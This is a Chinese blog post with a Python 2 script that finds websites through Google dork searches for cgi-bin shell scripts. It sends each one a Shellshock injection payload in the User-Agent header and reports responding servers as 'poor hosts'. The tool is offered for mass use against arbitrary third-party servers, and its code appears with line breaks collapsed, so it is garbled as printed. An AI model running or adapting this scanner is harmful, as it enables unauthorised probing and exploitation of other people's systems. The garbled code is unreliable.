Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。
其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何检测漏洞思路也很简单,我这里直接根据服务器返回码进行判断的。

思路就是以上这些,下面还是和往常一样,贴代码:

#coding=utf-8
import requests
import json
import sys
import threading
import socket
vul_res = []
class GoogleURLProvider():def __init__(self,pageCount,proxies):self.pageCount = pageCount #查询的页数self.keywords = r'inurl:cgi-bin filetype:sh'self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"self.proxies = proxiesdef getRequest(self,url):return requests.get(url,proxies=self.proxies,verify=False)def getUrls(self):ret_list = []tmp_list = []for x in xrange(0,self.pageCount):url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)try:r = self.getRequest(url) results = json.loads(r.text)if not results:continueinfos = results['responseData']['results']if infos:for i in infos:tmp_list.append(i['url'])except Exception, e:continueret_list = ret_list + tmp_listreturn ret_listclass BashRCEDetector():def __init__(self,urls):self.urls = urlsdef detector(self):global vul_resfor x in self.urls:#多线程执行each = EachWorker(x)each.start()each.join()'''线程工作类'''
class EachWorker(threading.Thread):def __init__(self,url):threading.Thread.__init__(self)self.url = urldef run(self):global vul_resuseragent_header = {'User-Agent':'''() { 1;}; echo 'eee'''}try:r = requests.get(self.url,headers = useragent_header,timeout=8)if r.status_code == 500:print "{url} has Bash RCE vulnerability".format(url=self.url)vul_res.append(self.url)else:passexcept socket.timeout, e:passexcept requests.exceptions.Timeout, e:passexcept requests.exceptions.ConnectionError, e:passif __name__ == '__main__':print 'Powered by:Exploit QQ:739858341'print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'if len(sys.argv) != 2:print 'Usage:python BashRCEScanner <google pageCount>'sys.exit()#goagent proxy#在这里修改,加入你自己的代理即可使用proxies = {'http':"http://127.0.0.1:8087",'https':"http://127.0.0.1:8087"}url_res = []vul_guys = []urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)url_res = urlgetter.getUrls()bash_detector = BashRCEDetector(url_res)bash_detector.detector()if len(vul_res) == 0:print 'This group have no vulnerability'else:print 'Find %d poor host(s)' % len(vul_res) 

运行截图:

Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本相关推荐

  1. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  2. Fastjson 1.2.24远程代码执行漏洞(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl)

    1.漏洞信息 1.1 漏洞简介 · 漏洞名称:Fastjson 1.2.24远程代码执行漏洞(com.sun.org.apache.xalan.internal.xsltc.trax.Template ...

  3. struts2远程代码执行漏洞合集

    声明 好好学习,天天向上 S2-001 漏洞描述 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中.例 ...

  4. php 远程代码执行漏洞复现 cve-2019-11043

    漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...

  5. cve-2019-1821 思科 Cisco Prime 企业局域网管理器 远程代码执行 漏洞分析

    前言 不是所有目录遍历漏洞危害都相同,取决于遍历的用法以及用户交互程度.正如你将看到,本文的这个漏洞类在代码中非常难发现,但可以造成巨大的影响. 这个漏洞存在于思科Prime Infrastructu ...

  6. linux struts2漏洞,重大漏洞预警:Struts 2 远程代码执行漏洞(s2-045\s2-046) (含PoC)

    背景介绍 近日,安全研究人员发现著名J2EE框架--Struts2存在远程代码执行的漏洞,Struts2官方已经确认该漏洞(S2-045,S2-046),并定级为高危漏洞. Struts2 的使用范围 ...

  7. [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  8. 详述 PyPI 中的远程代码执行漏洞,可引发供应链攻击

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士 日本安全研究员RyotaK 曾在上周发现Cloudflare 公司CDNJS 服务中的一个漏洞,可导致第三方在当前12%的网站上运行恶意代 ...

  9. Apache Druid远程代码执行漏洞(CVE-2021-25646)

    Apache Druid远程代码执行漏洞(CVE-2021-25646) 0x01 漏洞简介 Apache Druid 是用 Java 编写的面向列的开源分布式数据存储, 通常用于商业智能/ OLAP ...

最新文章

  1. 算法导论之红黑树的学习
  2. 框架优点_铝型材框架相比其他框架的优点
  3. anaconda管理环境
  4. 离合器预减振超载造成变速箱怠速异响matlab与python仿真分析
  5. artdialog子弹窗关闭父弹窗
  6. ZOJ 3810 A Volcanic Island (2014年牡丹江赛区网络赛B题)
  7. 浪曦视频在线的ASP.NET AJAX视频教程下载
  8. php tcpdf image,php采用tcpdf生成pdf支持中文,图片
  9. 4g通信模块怎么连接sim卡_SIM卡GPRS模块知识详解 浅谈SIM卡GPRS之原理模块
  10. ROS里程计的学习(odometry) (一)
  11. h264js解码直播解码显示
  12. 批量给pdf加水印,请用这个办法
  13. Guass-Legendre(高斯-勒让德)求积方法 | Guass型求积公式 + Legendre多项式
  14. 恒生电子软件工程师面试
  15. 用python的turtle画等边三角形讲解_通过Python turtle绘制等边三角形谈编程思维和逻辑...
  16. 山西省将率先实现全覆盖社保“一卡通”
  17. HarmonyOS助力构建“食用菌智慧农场”
  18. vs2013 分析 profiler 导致电脑重启
  19. 计算机专业英语的特点 1,计算机专业英语的的一些特点.doc
  20. iOS--中文排序、全拼音排序

热门文章

  1. Azure IoT Edge入门(2)部署一台Edge Device
  2. 批量将word转换成excel格式的方法
  3. SpreadJS 表格控件相关基础知识
  4. win10无限蓝屏 ,错误代码BAD_SYSTEM_CONFIG_INFO
  5. 硅谷再撒钱:公司暴力涨薪,HR“大打出手”,这场人才战富了谁?
  6. postman脚本批量请求
  7. 纳米红光更安全的养生方式——红光光浴#大健康#红光光浴#红光#种光光学
  8. 插槽和axios的封装
  9. WPF自学手册-读书笔记(三)小有所成
  10. 涂鸦智能C/C++面经